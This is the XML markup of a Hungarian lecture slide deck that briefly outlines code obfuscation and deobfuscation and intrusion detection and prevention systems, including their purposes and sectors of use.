                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId18"/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr>
                      <a:xfrm>
                        <a:off x="7391152" y="3923313"/>
                        <a:ext cx="3221272" cy="228665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30333F8F-8EF5-2993-9766-22081D4B8FF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2036254694"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1394141" y="3746624"/>
          <a:ext cx="5096887" cy="2640028"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj r:id="rId19" imgW="13596073" imgH="7041452" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj r:id="rId19" imgW="13596073" imgH="7041452" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name=""/>
                      <p:cNvPicPr/>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId20"/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr>
                      <a:xfrm>
                        <a:off x="1394141" y="3746624"/>
                        <a:ext cx="5096887" cy="2640028"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="168628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10"/>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14"/>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9"/>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23"/>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24"/>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25"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="38" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="39" presetID="10" presetClass="entr" presetSubtype="0"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4F78EAF8-B5D7-8F88-0D81-ED086B0CE368}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C7830B7-98EA-AAF8-B8C5-1845D7E265EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2293327" y="2681656"/>
            <a:ext cx="7605346" cy="83526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0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">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hu-HU" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xöfmöaöz n svtlryzrg :)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="32" name="Straight Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{053F780F-432F-4075-95EB-1532B5FBE389}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742948" y="1126815"/>
            <a:ext cx="1056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4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E7A70C21-0C2D-48D1-B77D-596C1F38F52A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4785360" y="605176"/>
            <a:ext cx="6523988" cy="456863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b" anchorCtr="0">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r"/>
            <a:r>
              <a:rPr lang="hu-HU" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>OB/DEOB, IPS/IDS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{016234A2-1CE9-4F1E-A03C-0D4E7BDC2B88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742947" y="1299836"/>
            <a:ext cx="4507232" cy="373371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">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sz="2200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>OBFUSZKÁLÁS / DEOBFUSZKÁLÁS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{053A3859-1B85-4547-A8C1-DC39E96F7350}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742949" y="1783045"/>
            <a:ext cx="5213347" cy="3009391"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">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hu-HU" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>érthetőség nehezítése</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>visszafejthetőség akadályozása</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>algoritmus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>működési logika</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tényleges </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>forrás</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kód</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>célja</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>üzleti titok védelme</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>szellemi tulajdon védelme</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A936F6-6200-46E2-B5A7-259A341B6274}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742948" y="1126815"/>
            <a:ext cx="1056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A65ABDBD-F02A-47FB-8CB6-2E1ABB483D02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1299801"/>
            <a:ext cx="4367528" cy="373371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">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sz="2200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>IDS/IPS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{086DF4CA-57DA-42C6-A0B2-DF2B77D22312}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1783045"/>
            <a:ext cx="5213348" cy="4069142"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">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hu-HU" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>komplex megoldások</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>monitorozás</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>detektálás</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>automatizált válasz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>felhasználási terület</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ipari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> méretek</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" cap="none">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kritikus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> infrasturktúra</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" cap="none">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>energetikai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> szektor</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" cap="none">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pénzügyi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> szektor</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" cap="none">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="hu-HU" cap="none">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="hu-HU" cap="none">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6361BD15-0CA3-4088-57F0-1CF1BFA32EF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014413" y="5205160"/>
            <a:ext cx="3770947" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>VÉDELMI RENDSZER KIKERÜLÉSE</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="183745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animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15">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animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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xEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15">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xEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15">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xEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15">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2">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22">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2">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>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22">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>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22">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22">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2">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>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22">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="66" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>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22">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="72" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>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22">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
